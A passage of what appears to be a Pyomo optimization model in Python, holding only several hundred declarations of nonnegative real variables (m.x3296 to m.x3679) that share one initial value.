m.x3296 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3297 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3298 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3299 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3300 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3301 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3302 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3303 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3304 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3305 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3306 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3307 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3308 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3309 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3310 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3311 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3312 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3313 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3314 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3315 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3316 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3317 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3318 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3319 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3320 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3321 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3322 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3323 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3324 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3325 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3326 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3327 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3328 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3329 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3330 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3331 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3332 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3333 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3334 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3335 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3336 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3337 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3338 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3339 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3340 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3341 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3342 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3343 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3344 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3345 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3346 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3347 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3348 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3349 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3350 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3351 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3352 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3353 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3354 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3355 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3356 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3357 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3358 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3359 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3360 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3361 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3362 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3363 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3364 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3365 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3366 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3367 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3368 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3369 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3370 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3371 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3372 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3373 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3374 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3375 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3376 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3377 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3378 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3379 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3380 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3381 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3382 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3383 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3384 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3385 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3386 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3387 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3388 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3389 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3390 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3391 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3392 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3393 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3394 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3395 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3396 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3397 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3398 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3399 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3400 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3401 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3402 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3403 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3404 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3405 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3406 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3407 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3408 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3409 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3410 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3411 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3412 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3413 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3414 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3415 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3416 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3417 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3418 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3419 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3420 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3421 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3422 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3423 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3424 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3425 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3426 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3427 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3428 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3429 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3430 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3431 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3432 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3433 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3434 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3435 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3436 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3437 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3438 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3439 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3440 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3441 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3442 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3443 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3444 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3445 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3446 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3447 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3448 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3449 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3450 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3451 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3452 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3453 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3454 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3455 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3456 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3457 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3458 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3459 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3460 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3461 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3462 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3463 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3464 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3465 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3466 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3467 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3468 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3469 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3470 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3471 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3472 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3473 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3474 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3475 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3476 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3477 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3478 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3479 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3480 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3481 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3482 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3483 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3484 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3485 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3486 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3487 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3488 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3489 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3490 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3491 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3492 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3493 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3494 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3495 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3496 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3497 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3498 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3499 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3500 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3501 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3502 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3503 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3504 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3505 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3506 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3507 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3508 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3509 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3510 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3511 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3512 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3513 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3514 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3515 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3516 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3517 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3518 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3519 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3520 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3521 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3522 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3523 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3524 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3525 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3526 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3527 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3528 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3529 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3530 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3531 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3532 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3533 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3534 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3535 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3536 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3537 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3538 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3539 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3540 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3541 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3542 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3543 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3544 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3545 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3546 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3547 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3548 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3549 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3550 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3551 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3552 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3553 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3554 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3555 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3556 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3557 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3558 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3559 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3560 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3561 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3562 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3563 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3564 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3565 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3566 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3567 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3568 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3569 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3570 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3571 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3572 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3573 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3574 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3575 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3576 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3577 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3578 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3579 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3580 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3581 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3582 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3583 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3584 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3585 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3586 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3587 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3588 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3589 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3590 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3591 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3592 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3593 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3594 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3595 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3596 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3597 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3598 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3599 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3600 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3601 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3602 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3603 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3604 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3605 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3606 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3607 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3608 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3609 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3610 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3611 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3612 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3613 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3614 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3615 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3616 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3617 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3618 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3619 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3620 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3621 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3622 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3623 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3624 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3625 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3626 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3627 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3628 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3629 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3630 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3631 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3632 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3633 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3634 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3635 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3636 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3637 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3638 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3639 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3640 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3641 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3642 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3643 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3644 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3645 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3646 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3647 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3648 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3649 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3650 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3651 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3652 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3653 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3654 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3655 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3656 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3657 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3658 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3659 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3660 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3661 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3662 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3663 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3664 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3665 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3666 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3667 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3668 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3669 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3670 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3671 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3672 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3673 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3674 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3675 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3676 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3677 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3678 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3679 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
